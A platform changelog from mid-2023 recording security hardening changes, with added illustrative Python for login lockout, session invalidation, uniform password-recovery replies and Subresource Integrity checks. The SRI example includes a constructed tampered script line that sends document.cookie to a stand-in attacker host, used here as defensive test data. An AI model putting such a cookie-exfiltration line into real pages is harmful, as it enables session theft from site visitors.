Starting in May 2023, we document changes made to the platform. This page lists each change and the date it was deployed to our production environment.
August 28th, 2023
- Invalidate user session on logout. Previously, the token generated during login was managed only by the browser: when a user logged out, we instructed the browser to discard the token, but the server itself did not invalidate it. This update adds server-side invalidation of the token on logout.
- Server header removal from HTTP responses.
- Removal of crossdomain.xml resource
- Rate limit authentication requests. As part of SOC 2 compliance requirements, we have implemented rate limiting on failed login attempts. An IP address that fails to log in 10 times in a row is blocked from logging in for 15 minutes.
- The default parsing format of a user is now shown when viewing a staff member's information.
- Prevent IFRAME access to the admin site. As part of SOC 2 compliance requirements, we have disabled the ability to embed the admin site in an IFRAME. Nobody was actually doing this, so there is no user-facing effect; it is now explicitly disabled.
- Do not inform the user whether the provided email address was found when recovering a password. Previously, we told the user when the email address they provided was not found in our system. We did this to help users who may have multiple email addresses, but it also gave potentially malicious actors a way to enumerate valid accounts. We no longer indicate whether the email address was found when recovering a password.
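The three authentication items above (server-side session invalidation on logout, the 10-failures / 15-minute IP lockout, and the uniform password-recovery response) are shown together in the following added example. It is illustrative code written for this page, not the platform's own implementation, and it assumes an in-memory session store, a hypothetical `USERS` table and an injectable clock so the lockout expiry can be exercised without waiting.

```python
import hmac
import secrets
import time
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional, Tuple

MAX_FAILURES = 10            # consecutive failed logins per IP before lockout
LOCKOUT_SECONDS = 15 * 60    # 15-minute lockout, as described in the changelog

# Hypothetical user table (constructed for this example). Plaintext is used only to keep
# the example short; a real service stores and verifies salted password hashes.
USERS = {"alice@example.com": "correct horse battery staple"}

RECOVERY_MESSAGE = "If an account exists for that address, a password reset link has been sent."


@dataclass
class AuthService:
    clock: Callable[[], float] = time.time                     # injectable for tests
    sessions: Dict[str, str] = field(default_factory=dict)     # token -> email (server-side state)
    failures: Dict[str, int] = field(default_factory=dict)     # ip -> consecutive failures
    locked_until: Dict[str, float] = field(default_factory=dict)  # ip -> unlock timestamp

    def _is_locked(self, ip: str) -> bool:
        until = self.locked_until.get(ip)
        if until is None:
            return False
        if self.clock() < until:
            return True
        # Lockout expired: clear it and start counting failures from zero again.
        del self.locked_until[ip]
        self.failures.pop(ip, None)
        return False

    def login(self, ip: str, email: str, password: str) -> Tuple[bool, Optional[str]]:
        """Return (ok, token). A locked IP is refused before the password is even checked."""
        if self._is_locked(ip):
            return False, None
        expected = USERS.get(email)
        # compare_digest keeps the comparison itself constant-time.
        ok = expected is not None and hmac.compare_digest(expected.encode(), password.encode())
        if not ok:
            n = self.failures.get(ip, 0) + 1
            self.failures[ip] = n
            if n >= MAX_FAILURES:
                self.locked_until[ip] = self.clock() + LOCKOUT_SECONDS
            return False, None
        self.failures.pop(ip, None)          # a success resets the consecutive counter
        token = secrets.token_urlsafe(32)    # unguessable session token
        self.sessions[token] = email         # the server, not only the browser, tracks it
        return True, token

    def is_authenticated(self, token: str) -> bool:
        return token in self.sessions

    def logout(self, token: str) -> None:
        """Server-side invalidation: a copy of the token the browser kept is now useless."""
        self.sessions.pop(token, None)

    def recover_password(self, email: str) -> str:
        """Same response whether or not the address exists, so the endpoint cannot be used
        to enumerate accounts."""
        if email in USERS:
            pass  # a real service would queue the reset e-mail here
        return RECOVERY_MESSAGE
```

The lockout counts consecutive failures per IP and resets on a successful login, which matches the wording above; a real deployment would keep these counters in shared storage (for example the session database or a cache) so that every application instance enforces the same limit.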
July 28th, 2023
- Added password complexity requirements when creating users and changing passwords. This was done in order to address SOC 2 compliance requirements.
- Fix for an issue where unique viewer counts stopped populating. This was caused by a change Google made to its APIs for fetching analytics data.
- Updates to include links to invoices on First and Second late notices. Final notices already included the links.
June 11th, 2023
- Added default parsing format to user profile view
- Added integrity checking (Subresource Integrity) when referencing external JavaScript libraries, so that a hijacked or tampered copy of a library is rejected by the browser instead of executed.
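The integrity check above relies on an `integrity` attribute that carries a hash of the expected script body. The following added example (written for this page, not code from the platform) computes that value, emits the script tag, and mirrors the browser-side check against a constructed original and a constructed tampered copy of the library; the CDN URL and script contents are made up for illustration.

```python
import base64
import hashlib
import re

# Constructed sample data: the library as the CDN should serve it, and a copy an attacker
# modified in transit or on a compromised CDN.
ORIGINAL_JS = b"(function(){window.greet=function(n){return 'hello '+n;};})();"
TAMPERED_JS = ORIGINAL_JS + b"fetch('https://attacker.invalid/?c='+document.cookie);"

ALLOWED_ALGOS = ("sha256", "sha384", "sha512")  # the only digests SRI accepts


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Return the integrity attribute value for body: '<algo>-<base64 digest>'."""
    if algo not in ALLOWED_ALGOS:
        raise ValueError("SRI only allows sha256, sha384 or sha512")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, body: bytes) -> str:
    """Build the tag to put in the page. crossorigin is required for cross-origin scripts,
    otherwise the browser cannot read the body to hash it and the load fails."""
    return f'<script src="{src}" integrity="{sri_hash(body)}" crossorigin="anonymous"></script>'


def verify_integrity(tag: str, fetched_body: bytes) -> bool:
    """Mirror of the browser's check: recompute the digest of what was fetched and compare it
    with the integrity attribute. Several space-separated hashes may be listed; this simplified
    version accepts the body if any listed hash matches, and skips tokens it cannot parse."""
    m = re.search(r'integrity="([^"]*)"', tag)
    if not m:
        return False  # no integrity attribute: nothing to enforce
    for token in m.group(1).split():
        algo, _, _expected = token.partition("-")
        try:
            if sri_hash(fetched_body, algo) == token:
                return True
        except ValueError:
            continue  # unknown algorithm token, ignored like a browser would
    return False
```

Regenerate the hash whenever the pinned library version changes; a stale `integrity` value blocks the new file just as it would block a tampered one, which is the point of the control.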
May 12th, 2023
- Fixed position issue with realtime caption pull endpoint